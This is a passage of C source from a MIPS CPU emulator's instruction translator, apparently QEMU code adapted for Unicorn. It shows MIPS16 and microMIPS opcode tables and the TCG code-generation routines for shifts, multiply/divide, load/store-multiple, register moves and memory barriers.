case RR_DSRA: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift_imm(ctx, OPC_DSRA, ry, ry, sa); break; case RR_DSLLV: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift(ctx, OPC_DSLLV, ry, rx, ry); break; case RR_DSRLV: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift(ctx, OPC_DSRLV, ry, rx, ry); break; case RR_DSRAV: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift(ctx, OPC_DSRAV, ry, rx, ry); break; #endif case RR_MULT: gen_muldiv(ctx, OPC_MULT, 0, rx, ry); break; case RR_MULTU: gen_muldiv(ctx, OPC_MULTU, 0, rx, ry); break; case RR_DIV: gen_muldiv(ctx, OPC_DIV, 0, rx, ry); break; case RR_DIVU: gen_muldiv(ctx, OPC_DIVU, 0, rx, ry); break; #if defined(TARGET_MIPS64) case RR_DMULT: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_muldiv(ctx, OPC_DMULT, 0, rx, ry); break; case RR_DMULTU: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_muldiv(ctx, OPC_DMULTU, 0, rx, ry); break; case RR_DDIV: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_muldiv(ctx, OPC_DDIV, 0, rx, ry); break; case RR_DDIVU: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_muldiv(ctx, OPC_DDIVU, 0, rx, ry); break; #endif default: generate_exception_end(ctx, EXCP_RI); break; } break; case M16_OPC_EXTEND: decode_extended_mips16_opc(env, ctx); n_bytes = 4; break; #if defined(TARGET_MIPS64) case M16_OPC_I64: funct = (ctx->opcode >> 8) & 0x7; decode_i64_mips16(ctx, ry, funct, offset, 0); break; #endif default: generate_exception_end(ctx, EXCP_RI); break; } return n_bytes; } /* microMIPS extension to MIPS32/MIPS64 */ /* * microMIPS32/microMIPS64 major opcodes * * 1. MIPS Architecture for Programmers Volume II-B: * The microMIPS32 Instruction Set (Revision 3.05) * * Table 6.2 microMIPS32 Encoding of Major Opcode Field * * 2. MIPS Architecture For Programmers Volume II-A: * The MIPS64 Instruction Set (Revision 3.51) */ enum { POOL32A = 0x00, POOL16A = 0x01, LBU16 = 0x02, MOVE16 = 0x03, ADDI32 = 0x04, R6_LUI = 0x04, AUI = 0x04, LBU32 = 0x05, SB32 = 0x06, LB32 = 0x07, POOL32B = 0x08, POOL16B = 0x09, LHU16 = 0x0a, ANDI16 = 0x0b, ADDIU32 = 0x0c, LHU32 = 0x0d, SH32 = 0x0e, LH32 = 0x0f, POOL32I = 0x10, POOL16C = 0x11, LWSP16 = 0x12, POOL16D = 0x13, ORI32 = 0x14, POOL32F = 0x15, POOL32S = 0x16, /* MIPS64 */ DADDIU32 = 0x17, /* MIPS64 */ POOL32C = 0x18, LWGP16 = 0x19, LW16 = 0x1a, POOL16E = 0x1b, XORI32 = 0x1c, JALS32 = 0x1d, BOVC = 0x1d, BEQC = 0x1d, BEQZALC = 0x1d, ADDIUPC = 0x1e, PCREL = 0x1e, BNVC = 0x1f, BNEC = 0x1f, BNEZALC = 0x1f, R6_BEQZC = 0x20, JIC = 0x20, POOL16F = 0x21, SB16 = 0x22, BEQZ16 = 0x23, BEQZC16 = 0x23, SLTI32 = 0x24, BEQ32 = 0x25, BC = 0x25, SWC132 = 0x26, LWC132 = 0x27, /* 0x29 is reserved */ RES_29 = 0x29, R6_BNEZC = 0x28, JIALC = 0x28, SH16 = 0x2a, BNEZ16 = 0x2b, BNEZC16 = 0x2b, SLTIU32 = 0x2c, BNE32 = 0x2d, BALC = 0x2d, SDC132 = 0x2e, LDC132 = 0x2f, /* 0x31 is reserved */ RES_31 = 0x31, BLEZALC = 0x30, BGEZALC = 0x30, BGEUC = 0x30, SWSP16 = 0x32, B16 = 0x33, BC16 = 0x33, ANDI32 = 0x34, J32 = 0x35, BGTZC = 0x35, BLTZC = 0x35, BLTC = 0x35, SD32 = 0x36, /* MIPS64 */ LD32 = 0x37, /* MIPS64 */ /* 0x39 is reserved */ RES_39 = 0x39, BGTZALC = 0x38, BLTZALC = 0x38, BLTUC = 0x38, SW16 = 0x3a, LI16 = 0x3b, JALX32 = 0x3c, JAL32 = 0x3d, BLEZC = 0x3d, BGEZC = 0x3d, BGEC = 0x3d, SW32 = 0x3e, LW32 = 0x3f }; /* PCREL Instructions perform PC-Relative address calculation. 
bits 20..16 */ enum { ADDIUPC_00 = 0x00, ADDIUPC_01 = 0x01, ADDIUPC_02 = 0x02, ADDIUPC_03 = 0x03, ADDIUPC_04 = 0x04, ADDIUPC_05 = 0x05, ADDIUPC_06 = 0x06, ADDIUPC_07 = 0x07, AUIPC = 0x1e, ALUIPC = 0x1f, LWPC_08 = 0x08, LWPC_09 = 0x09, LWPC_0A = 0x0A, LWPC_0B = 0x0B, LWPC_0C = 0x0C, LWPC_0D = 0x0D, LWPC_0E = 0x0E, LWPC_0F = 0x0F, }; /* POOL32A encoding of minor opcode field */ enum { /* * These opcodes are distinguished only by bits 9..6; those bits are * what are recorded below. */ SLL32 = 0x0, SRL32 = 0x1, SRA = 0x2, ROTR = 0x3, SELEQZ = 0x5, SELNEZ = 0x6, R6_RDHWR = 0x7, SLLV = 0x0, SRLV = 0x1, SRAV = 0x2, ROTRV = 0x3, ADD = 0x4, ADDU32 = 0x5, SUB = 0x6, SUBU32 = 0x7, MUL = 0x8, AND = 0x9, OR32 = 0xa, NOR = 0xb, XOR32 = 0xc, SLT = 0xd, SLTU = 0xe, MOVN = 0x0, R6_MUL = 0x0, MOVZ = 0x1, MUH = 0x1, MULU = 0x2, MUHU = 0x3, LWXS = 0x4, R6_DIV = 0x4, MOD = 0x5, R6_DIVU = 0x6, MODU = 0x7, /* The following can be distinguished by their lower 6 bits. */ BREAK32 = 0x07, INS = 0x0c, LSA = 0x0f, ALIGN = 0x1f, EXT = 0x2c, POOL32AXF = 0x3c, SIGRIE = 0x3f }; /* POOL32AXF encoding of minor opcode field extension */ /* * 1. MIPS Architecture for Programmers Volume II-B: * The microMIPS32 Instruction Set (Revision 3.05) * * Table 6.5 POOL32Axf Encoding of Minor Opcode Extension Field * * 2. MIPS Architecture for Programmers VolumeIV-e: * The MIPS DSP Application-Specific Extension * to the microMIPS32 Architecture (Revision 2.34) * * Table 5.5 POOL32Axf Encoding of Minor Opcode Extension Field */ enum { /* bits 11..6 */ TEQ = 0x00, TGE = 0x08, TGEU = 0x10, TLT = 0x20, TLTU = 0x28, TNE = 0x30, MFC0 = 0x03, MTC0 = 0x0b, /* begin of microMIPS32 DSP */ /* bits 13..12 for 0x01 */ MFHI_ACC = 0x0, MFLO_ACC = 0x1, MTHI_ACC = 0x2, MTLO_ACC = 0x3, /* bits 13..12 for 0x2a */ MADD_ACC = 0x0, MADDU_ACC = 0x1, MSUB_ACC = 0x2, MSUBU_ACC = 0x3, /* bits 13..12 for 0x32 */ MULT_ACC = 0x0, MULTU_ACC = 0x1, /* end of microMIPS32 DSP */ /* bits 15..12 for 0x2c */ BITSWAP = 0x0, SEB = 0x2, SEH = 0x3, CLO = 0x4, CLZ = 0x5, RDHWR = 0x6, WSBH = 0x7, MULT = 0x8, MULTU = 0x9, DIV = 0xa, DIVU = 0xb, MADD = 0xc, MADDU = 0xd, MSUB = 0xe, MSUBU = 0xf, /* bits 15..12 for 0x34 */ MFC2 = 0x4, MTC2 = 0x5, MFHC2 = 0x8, MTHC2 = 0x9, CFC2 = 0xc, CTC2 = 0xd, /* bits 15..12 for 0x3c */ JALR = 0x0, JR = 0x0, /* alias */ JALRC = 0x0, JRC = 0x0, JALR_HB = 0x1, JALRC_HB = 0x1, JALRS = 0x4, JALRS_HB = 0x5, /* bits 15..12 for 0x05 */ RDPGPR = 0xe, WRPGPR = 0xf, /* bits 15..12 for 0x0d */ TLBP = 0x0, TLBR = 0x1, TLBWI = 0x2, TLBWR = 0x3, TLBINV = 0x4, TLBINVF = 0x5, WAIT = 0x9, IRET = 0xd, DERET = 0xe, ERET = 0xf, /* bits 15..12 for 0x15 */ DMT = 0x0, DVPE = 0x1, EMT = 0x2, EVPE = 0x3, /* bits 15..12 for 0x1d */ DI = 0x4, EI = 0x5, /* bits 15..12 for 0x2d */ SYNC = 0x6, SYSCALL = 0x8, SDBBP = 0xd, /* bits 15..12 for 0x35 */ MFHI32 = 0x0, MFLO32 = 0x1, MTHI32 = 0x2, MTLO32 = 0x3, }; /* POOL32B encoding of minor opcode field (bits 15..12) */ enum { LWC2 = 0x0, LWP = 0x1, LDP = 0x4, LWM32 = 0x5, CACHE = 0x6, LDM = 0x7, SWC2 = 0x8, SWP = 0x9, SDP = 0xc, SWM32 = 0xd, SDM = 0xf }; /* POOL32C encoding of minor opcode field (bits 15..12) */ enum { LWL = 0x0, SWL = 0x8, LWR = 0x1, SWR = 0x9, PREF = 0x2, ST_EVA = 0xa, LL = 0x3, SC = 0xb, LDL = 0x4, SDL = 0xc, LDR = 0x5, SDR = 0xd, LD_EVA = 0x6, LWU = 0xe, LLD = 0x7, SCD = 0xf }; /* POOL32C LD-EVA encoding of minor opcode field (bits 11..9) */ enum { LBUE = 0x0, LHUE = 0x1, LWLE = 0x2, LWRE = 0x3, LBE = 0x4, LHE = 0x5, LLE = 0x6, LWE = 0x7, }; /* POOL32C ST-EVA encoding of minor opcode field (bits 11..9) */ enum 
{ SWLE = 0x0, SWRE = 0x1, PREFE = 0x2, CACHEE = 0x3, SBE = 0x4, SHE = 0x5, SCE = 0x6, SWE = 0x7, }; /* POOL32F encoding of minor opcode field (bits 5..0) */ enum { /* These are the bit 7..6 values */ ADD_FMT = 0x0, SUB_FMT = 0x1, MUL_FMT = 0x2, DIV_FMT = 0x3, /* These are the bit 8..6 values */ MOVN_FMT = 0x0, RSQRT2_FMT = 0x0, MOVF_FMT = 0x0, RINT_FMT = 0x0, SELNEZ_FMT = 0x0, MOVZ_FMT = 0x1, LWXC1 = 0x1, MOVT_FMT = 0x1, CLASS_FMT = 0x1, SELEQZ_FMT = 0x1, PLL_PS = 0x2, SWXC1 = 0x2, SEL_FMT = 0x2, PLU_PS = 0x3, LDXC1 = 0x3, MOVN_FMT_04 = 0x4, PUL_PS = 0x4, SDXC1 = 0x4, RECIP2_FMT = 0x4, MOVZ_FMT_05 = 0x05, PUU_PS = 0x5, LUXC1 = 0x5, CVT_PS_S = 0x6, SUXC1 = 0x6, ADDR_PS = 0x6, PREFX = 0x6, MADDF_FMT = 0x6, MULR_PS = 0x7, MSUBF_FMT = 0x7, MADD_S = 0x01, MADD_D = 0x09, MADD_PS = 0x11, ALNV_PS = 0x19, MSUB_S = 0x21, MSUB_D = 0x29, MSUB_PS = 0x31, NMADD_S = 0x02, NMADD_D = 0x0a, NMADD_PS = 0x12, NMSUB_S = 0x22, NMSUB_D = 0x2a, NMSUB_PS = 0x32, MIN_FMT = 0x3, MAX_FMT = 0xb, MINA_FMT = 0x23, MAXA_FMT = 0x2b, POOL32FXF = 0x3b, CABS_COND_FMT = 0x1c, /* MIPS3D */ C_COND_FMT = 0x3c, CMP_CONDN_S = 0x5, CMP_CONDN_D = 0x15 }; /* POOL32Fxf encoding of minor opcode extension field */ enum { CVT_L = 0x04, RSQRT_FMT = 0x08, FLOOR_L = 0x0c, CVT_PW_PS = 0x1c, CVT_W = 0x24, SQRT_FMT = 0x28, FLOOR_W = 0x2c, CVT_PS_PW = 0x3c, CFC1 = 0x40, RECIP_FMT = 0x48, CEIL_L = 0x4c, CTC1 = 0x60, CEIL_W = 0x6c, MFC1 = 0x80, CVT_S_PL = 0x84, TRUNC_L = 0x8c, MTC1 = 0xa0, CVT_S_PU = 0xa4, TRUNC_W = 0xac, MFHC1 = 0xc0, ROUND_L = 0xcc, MTHC1 = 0xe0, ROUND_W = 0xec, MOV_FMT = 0x01, MOVF = 0x05, ABS_FMT = 0x0d, RSQRT1_FMT = 0x1d, MOVT = 0x25, NEG_FMT = 0x2d, CVT_D = 0x4d, RECIP1_FMT = 0x5d, CVT_S = 0x6d }; /* POOL32I encoding of minor opcode field (bits 25..21) */ enum { BLTZ = 0x00, BLTZAL = 0x01, BGEZ = 0x02, BGEZAL = 0x03, BLEZ = 0x04, BNEZC = 0x05, BGTZ = 0x06, BEQZC = 0x07, TLTI = 0x08, BC1EQZC = 0x08, TGEI = 0x09, BC1NEZC = 0x09, TLTIU = 0x0a, BC2EQZC = 0x0a, TGEIU = 0x0b, BC2NEZC = 0x0b, TNEI = 0x0c, R6_SYNCI = 0x0c, LUI = 0x0d, TEQI = 0x0e, SYNCI = 0x10, BLTZALS = 0x11, BGEZALS = 0x13, BC2F = 0x14, BC2T = 0x15, BPOSGE64 = 0x1a, BPOSGE32 = 0x1b, /* These overlap and are distinguished by bit16 of the instruction */ BC1F = 0x1c, BC1T = 0x1d, BC1ANY2F = 0x1c, BC1ANY2T = 0x1d, BC1ANY4F = 0x1e, BC1ANY4T = 0x1f }; /* POOL16A encoding of minor opcode field */ enum { ADDU16 = 0x0, SUBU16 = 0x1 }; /* POOL16B encoding of minor opcode field */ enum { SLL16 = 0x0, SRL16 = 0x1 }; /* POOL16C encoding of minor opcode field */ enum { NOT16 = 0x00, XOR16 = 0x04, AND16 = 0x08, OR16 = 0x0c, LWM16 = 0x10, SWM16 = 0x14, JR16 = 0x18, JRC16 = 0x1a, JALR16 = 0x1c, JALR16S = 0x1e, MFHI16 = 0x20, MFLO16 = 0x24, BREAK16 = 0x28, SDBBP16 = 0x2c, JRADDIUSP = 0x30 }; /* R6 POOL16C encoding of minor opcode field (bits 0..5) */ enum { R6_NOT16 = 0x00, R6_AND16 = 0x01, R6_LWM16 = 0x02, R6_JRC16 = 0x03, MOVEP = 0x04, MOVEP_05 = 0x05, MOVEP_06 = 0x06, MOVEP_07 = 0x07, R6_XOR16 = 0x08, R6_OR16 = 0x09, R6_SWM16 = 0x0a, JALRC16 = 0x0b, MOVEP_0C = 0x0c, MOVEP_0D = 0x0d, MOVEP_0E = 0x0e, MOVEP_0F = 0x0f, JRCADDIUSP = 0x13, R6_BREAK16 = 0x1b, R6_SDBBP16 = 0x3b }; /* POOL16D encoding of minor opcode field */ enum { ADDIUS5 = 0x0, ADDIUSP = 0x1 }; /* POOL16E encoding of minor opcode field */ enum { ADDIUR2 = 0x0, ADDIUR1SP = 0x1 }; static int mmreg(int r) { static const int map[] = { 16, 17, 2, 3, 4, 5, 6, 7 }; return map[r]; } /* Used for 16-bit store instructions. 
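Encoding 0 maps to GPR 0 rather than GPR 16, so a 16-bit store can name $zero as its source register.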
*/ static int mmreg2(int r) { static const int map[] = { 0, 17, 2, 3, 4, 5, 6, 7 }; return map[r]; } #define uMIPS_RD(op) ((op >> 7) & 0x7) #define uMIPS_RS(op) ((op >> 4) & 0x7) #define uMIPS_RS2(op) uMIPS_RS(op) #define uMIPS_RS1(op) ((op >> 1) & 0x7) #define uMIPS_RD5(op) ((op >> 5) & 0x1f) #define uMIPS_RS5(op) (op & 0x1f) /* Signed immediate */ #define SIMM(op, start, width) \ ((int32_t)(((op >> start) & ((~0U) >> (32 - width))) \ << (32 - width)) \ >> (32 - width)) /* Zero-extended immediate */ #define ZIMM(op, start, width) ((op >> start) & ((~0U) >> (32 - width))) static void gen_addiur1sp(DisasContext *ctx) { int rd = mmreg(uMIPS_RD(ctx->opcode)); gen_arith_imm(ctx, OPC_ADDIU, rd, 29, ((ctx->opcode >> 1) & 0x3f) << 2); } static void gen_addiur2(DisasContext *ctx) { static const int decoded_imm[] = { 1, 4, 8, 12, 16, 20, 24, -1 }; int rd = mmreg(uMIPS_RD(ctx->opcode)); int rs = mmreg(uMIPS_RS(ctx->opcode)); gen_arith_imm(ctx, OPC_ADDIU, rd, rs, decoded_imm[ZIMM(ctx->opcode, 1, 3)]); } static void gen_addiusp(DisasContext *ctx) { int encoded = ZIMM(ctx->opcode, 1, 9); int decoded; if (encoded <= 1) { decoded = 256 + encoded; } else if (encoded <= 255) { decoded = encoded; } else if (encoded <= 509) { decoded = encoded - 512; } else { decoded = encoded - 768; } gen_arith_imm(ctx, OPC_ADDIU, 29, 29, decoded << 2); } static void gen_addius5(DisasContext *ctx) { int imm = SIMM(ctx->opcode, 1, 4); int rd = (ctx->opcode >> 5) & 0x1f; gen_arith_imm(ctx, OPC_ADDIU, rd, rd, imm); } static void gen_andi16(DisasContext *ctx) { static const int decoded_imm[] = { 128, 1, 2, 3, 4, 7, 8, 15, 16, 31, 32, 63, 64, 255, 32768, 65535 }; int rd = mmreg(uMIPS_RD(ctx->opcode)); int rs = mmreg(uMIPS_RS(ctx->opcode)); int encoded = ZIMM(ctx->opcode, 0, 4); gen_logic_imm(ctx, OPC_ANDI, rd, rs, decoded_imm[encoded]); } static void gen_ldst_multiple(DisasContext *ctx, uint32_t opc, int reglist, int base, int16_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; TCGv_i32 t2; if (ctx->hflags & MIPS_HFLAG_BMASK) { generate_exception_end(ctx, EXCP_RI); return; } t0 = tcg_temp_new(tcg_ctx); gen_base_offset_addr(ctx, t0, base, offset); t1 = tcg_const_tl(tcg_ctx, reglist); t2 = tcg_const_i32(tcg_ctx, ctx->mem_idx); save_cpu_state(ctx, 1); switch (opc) { case LWM32: gen_helper_lwm(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); break; case SWM32: gen_helper_swm(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); break; #ifdef TARGET_MIPS64 case LDM: gen_helper_ldm(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); break; case SDM: gen_helper_sdm(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); break; #endif } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); } static void gen_pool16c_insn(DisasContext *ctx) { int rd = mmreg((ctx->opcode >> 3) & 0x7); int rs = mmreg(ctx->opcode & 0x7); switch (((ctx->opcode) >> 4) & 0x3f) { case NOT16 + 0: case NOT16 + 1: case NOT16 + 2: case NOT16 + 3: gen_logic(ctx, OPC_NOR, rd, rs, 0); break; case XOR16 + 0: case XOR16 + 1: case XOR16 + 2: case XOR16 + 3: gen_logic(ctx, OPC_XOR, rd, rd, rs); break; case AND16 + 0: case AND16 + 1: case AND16 + 2: case AND16 + 3: gen_logic(ctx, OPC_AND, rd, rd, rs); break; case OR16 + 0: case OR16 + 1: case OR16 + 2: case OR16 + 3: gen_logic(ctx, OPC_OR, rd, rd, rs); break; case LWM16 + 0: case LWM16 + 1: case LWM16 + 2: case LWM16 + 3: { static const int lwm_convert[] = { 0x11, 0x12, 0x13, 0x14 }; int offset = ZIMM(ctx->opcode, 0, 4); gen_ldst_multiple(ctx, LWM32, lwm_convert[(ctx->opcode >> 4) & 0x3], 29, offset << 2); } break; case SWM16 
+ 0: case SWM16 + 1: case SWM16 + 2: case SWM16 + 3: { static const int swm_convert[] = { 0x11, 0x12, 0x13, 0x14 }; int offset = ZIMM(ctx->opcode, 0, 4); gen_ldst_multiple(ctx, SWM32, swm_convert[(ctx->opcode >> 4) & 0x3], 29, offset << 2); } break; case JR16 + 0: case JR16 + 1: { int reg = ctx->opcode & 0x1f; gen_compute_branch(ctx, OPC_JR, 2, reg, 0, 0, 4); } break; case JRC16 + 0: case JRC16 + 1: { int reg = ctx->opcode & 0x1f; gen_compute_branch(ctx, OPC_JR, 2, reg, 0, 0, 0); /* * Let normal delay slot handling in our caller take us * to the branch target. */ } break; case JALR16 + 0: case JALR16 + 1: gen_compute_branch(ctx, OPC_JALR, 2, ctx->opcode & 0x1f, 31, 0, 4); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; break; case JALR16S + 0: case JALR16S + 1: gen_compute_branch(ctx, OPC_JALR, 2, ctx->opcode & 0x1f, 31, 0, 2); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; break; case MFHI16 + 0: case MFHI16 + 1: gen_HILO(ctx, OPC_MFHI, 0, uMIPS_RS5(ctx->opcode)); break; case MFLO16 + 0: case MFLO16 + 1: gen_HILO(ctx, OPC_MFLO, 0, uMIPS_RS5(ctx->opcode)); break; case BREAK16: generate_exception_end(ctx, EXCP_BREAK); break; case SDBBP16: if (is_uhi(extract32(ctx->opcode, 0, 4))) { // gen_helper_do_semihosting(tcg_ctx, tcg_ctx->cpu_env); } else { /* * XXX: not clear which exception should be raised * when in debug mode... */ check_insn(ctx, ISA_MIPS32); generate_exception_end(ctx, EXCP_DBp); } break; case JRADDIUSP + 0: case JRADDIUSP + 1: { int imm = ZIMM(ctx->opcode, 0, 5); gen_compute_branch(ctx, OPC_JR, 2, 31, 0, 0, 0); gen_arith_imm(ctx, OPC_ADDIU, 29, 29, imm << 2); /* * Let normal delay slot handling in our caller take us * to the branch target. */ } break; default: generate_exception_end(ctx, EXCP_RI); break; } } static inline void gen_movep(DisasContext *ctx, int enc_dest, int enc_rt, int enc_rs) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rd, rs, re, rt; static const int rd_enc[] = { 5, 5, 6, 4, 4, 4, 4, 4 }; static const int re_enc[] = { 6, 7, 7, 21, 22, 5, 6, 7 }; static const int rs_rt_enc[] = { 0, 17, 2, 3, 16, 18, 19, 20 }; rd = rd_enc[enc_dest]; re = re_enc[enc_dest]; rs = rs_rt_enc[enc_rs]; rt = rs_rt_enc[enc_rt]; if (rs) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } if (rt) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[re], tcg_ctx->cpu_gpr[rt]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[re], 0); } } static void gen_pool16c_r6_insn(DisasContext *ctx) { int rt = mmreg((ctx->opcode >> 7) & 0x7); int rs = mmreg((ctx->opcode >> 4) & 0x7); switch (ctx->opcode & 0xf) { case R6_NOT16: gen_logic(ctx, OPC_NOR, rt, rs, 0); break; case R6_AND16: gen_logic(ctx, OPC_AND, rt, rt, rs); break; case R6_LWM16: { int lwm_converted = 0x11 + extract32(ctx->opcode, 8, 2); int offset = extract32(ctx->opcode, 4, 4); gen_ldst_multiple(ctx, LWM32, lwm_converted, 29, offset << 2); } break; case R6_JRC16: /* JRCADDIUSP */ if ((ctx->opcode >> 4) & 1) { /* JRCADDIUSP */ int imm = extract32(ctx->opcode, 5, 5); gen_compute_branch(ctx, OPC_JR, 2, 31, 0, 0, 0); gen_arith_imm(ctx, OPC_ADDIU, 29, 29, imm << 2); } else { /* JRC16 */ rs = extract32(ctx->opcode, 5, 5); gen_compute_branch(ctx, OPC_JR, 2, rs, 0, 0, 0); } break; case MOVEP: case MOVEP_05: case MOVEP_06: case MOVEP_07: case MOVEP_0C: case MOVEP_0D: case MOVEP_0E: case MOVEP_0F: { int enc_dest = uMIPS_RD(ctx->opcode); int enc_rt = uMIPS_RS2(ctx->opcode); int enc_rs = (ctx->opcode & 3) | ((ctx->opcode >> 1) & 4); gen_movep(ctx, enc_dest, enc_rt, enc_rs); } break; case 
R6_XOR16: gen_logic(ctx, OPC_XOR, rt, rt, rs); break; case R6_OR16: gen_logic(ctx, OPC_OR, rt, rt, rs); break; case R6_SWM16: { int swm_converted = 0x11 + extract32(ctx->opcode, 8, 2); int offset = extract32(ctx->opcode, 4, 4); gen_ldst_multiple(ctx, SWM32, swm_converted, 29, offset << 2); } break; case JALRC16: /* BREAK16, SDBBP16 */ switch (ctx->opcode & 0x3f) { case JALRC16: case JALRC16 + 0x20: /* JALRC16 */ gen_compute_branch(ctx, OPC_JALR, 2, (ctx->opcode >> 5) & 0x1f, 31, 0, 0); break; case R6_BREAK16: /* BREAK16 */ generate_exception(ctx, EXCP_BREAK); break; case R6_SDBBP16: /* SDBBP16 */ if (is_uhi(extract32(ctx->opcode, 6, 4))) { // gen_helper_do_semihosting(tcg_ctx, tcg_ctx->cpu_env); } else { if (ctx->hflags & MIPS_HFLAG_SBRI) { generate_exception(ctx, EXCP_RI); } else { generate_exception(ctx, EXCP_DBp); } } break; } break; default: generate_exception(ctx, EXCP_RI); break; } } static void gen_ldxs(DisasContext *ctx, int base, int index, int rd) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, base); if (index != 0) { gen_load_gpr(tcg_ctx, t1, index); tcg_gen_shli_tl(tcg_ctx, t1, t1, 2); gen_op_addr_add(ctx, t0, t1, t0); } tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TESL); gen_store_gpr(tcg_ctx, t1, rd); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_ldst_pair(DisasContext *ctx, uint32_t opc, int rd, int base, int16_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; if (ctx->hflags & MIPS_HFLAG_BMASK || rd == 31) { generate_exception_end(ctx, EXCP_RI); return; } t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_base_offset_addr(ctx, t0, base, offset); switch (opc) { case LWP: if (rd == base) { generate_exception_end(ctx, EXCP_RI); return; } tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TESL); gen_store_gpr(tcg_ctx, t1, rd); tcg_gen_movi_tl(tcg_ctx, t1, 4); gen_op_addr_add(ctx, t0, t0, t1); tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TESL); gen_store_gpr(tcg_ctx, t1, rd + 1); break; case SWP: gen_load_gpr(tcg_ctx, t1, rd); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); tcg_gen_movi_tl(tcg_ctx, t1, 4); gen_op_addr_add(ctx, t0, t0, t1); gen_load_gpr(tcg_ctx, t1, rd + 1); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); break; #ifdef TARGET_MIPS64 case LDP: if (rd == base) { generate_exception_end(ctx, EXCP_RI); return; } tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEQ); gen_store_gpr(tcg_ctx, t1, rd); tcg_gen_movi_tl(tcg_ctx, t1, 8); gen_op_addr_add(ctx, t0, t0, t1); tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEQ); gen_store_gpr(tcg_ctx, t1, rd + 1); break; case SDP: gen_load_gpr(tcg_ctx, t1, rd); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEQ); tcg_gen_movi_tl(tcg_ctx, t1, 8); gen_op_addr_add(ctx, t0, t0, t1); gen_load_gpr(tcg_ctx, t1, rd + 1); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEQ); break; #endif } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_sync(TCGContext *tcg_ctx, int stype) { TCGBar tcg_mo = TCG_BAR_SC; switch (stype) { case 0x4: /* SYNC_WMB */ tcg_mo |= TCG_MO_ST_ST; break; case 0x10: /* SYNC_MB */ tcg_mo |= TCG_MO_ALL; break; case 0x11: /* SYNC_ACQUIRE */ tcg_mo |= TCG_MO_LD_LD | TCG_MO_LD_ST; break; case 0x12: /* SYNC_RELEASE */ tcg_mo |= TCG_MO_ST_ST | TCG_MO_LD_ST; break; case 0x13: /* SYNC_RMB */ tcg_mo |= TCG_MO_LD_LD; break; default: tcg_mo |= TCG_MO_ALL; break; } tcg_gen_mb(tcg_ctx, tcg_mo); } static void 
gen_pool32axf(CPUMIPSState *env, DisasContext *ctx, int rt, int rs) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int extension = (ctx->opcode >> 6) & 0x3f; int minor = (ctx->opcode >> 12) & 0xf; uint32_t mips32_op; switch (extension) { case TEQ: mips32_op = OPC_TEQ; goto do_trap; case TGE: mips32_op = OPC_TGE; goto do_trap; case TGEU: mips32_op = OPC_TGEU; goto do_trap; case TLT: mips32_op = OPC_TLT; goto do_trap; case TLTU: mips32_op = OPC_TLTU; goto do_trap; case TNE: mips32_op = OPC_TNE; do_trap: gen_trap(ctx, mips32_op, rs, rt, -1); break; case MFC0: case MFC0 + 32: check_cp0_enabled(ctx); if (rt == 0) { /* Treat as NOP. */ break; } gen_mfc0(ctx, tcg_ctx->cpu_gpr[rt], rs, (ctx->opcode >> 11) & 0x7); break; case MTC0: case MTC0 + 32: check_cp0_enabled(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_mtc0(ctx, t0, rs, (ctx->opcode >> 11) & 0x7); tcg_temp_free(tcg_ctx, t0); } break; case 0x2a: switch (minor & 3) { case MADD_ACC: gen_muldiv(ctx, OPC_MADD, (ctx->opcode >> 14) & 3, rs, rt); break; case MADDU_ACC: gen_muldiv(ctx, OPC_MADDU, (ctx->opcode >> 14) & 3, rs, rt); break; case MSUB_ACC: gen_muldiv(ctx, OPC_MSUB, (ctx->opcode >> 14) & 3, rs, rt); break; case MSUBU_ACC: gen_muldiv(ctx, OPC_MSUBU, (ctx->opcode >> 14) & 3, rs, rt); break; default: goto pool32axf_invalid; } break; case 0x32: switch (minor & 3) { case MULT_ACC: gen_muldiv(ctx, OPC_MULT, (ctx->opcode >> 14) & 3, rs, rt); break; case MULTU_ACC: gen_muldiv(ctx, OPC_MULTU, (ctx->opcode >> 